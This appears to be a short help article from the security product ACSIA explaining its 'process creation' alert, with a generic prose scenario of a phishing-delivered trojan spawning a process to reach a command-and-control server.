Overview
This article will explain the ACSIA alert called "process creation".
Explaining the process creation
"Process creation" refers to the action of starting or initiating a new software program or task on a computer or device. When a process is created, it becomes an active part of the operating system, running in the background or interacting with the user interface, and it can perform various functions based on its design and purpose.
Example of an attack involving "process creation":
Imagine a scenario where an attacker wants to gain unauthorized access to a company's network. The attacker decides to use a "process creation" attack to achieve their goal.
The attacker gains initial access to an employee's computer within the company. They use a social engineering tactic to trick the employee into clicking a malicious link in an email or a file attachment, which contains a stealthy malware known as a "trojan."
As soon as the employee clicks the link or opens the attachment, the trojan malware is executed on the computer. The malware's primary goal is to gain control over the system and provide a backdoor for the attacker to access the network.
One of the first things the trojan does is attempt to create a new process within the operating system. It does this to establish a connection to a remote command-and-control server operated by the attacker.
Once the trojan successfully creates this new process and establishes the connection, the attacker gains control over the compromised computer. From this point, the attacker can remotely access the company's network and launch further attacks, exploring the network for sensitive data or attempting to infect other devices.
The "process creation" attack was critical for the trojan's success as it allowed the malware to become an active part of the computer's operating system, enabling it to carry out malicious activities undetected by the user or traditional security measures.
ACSIA alerts you when a process to be investigated is created on your infrastructure.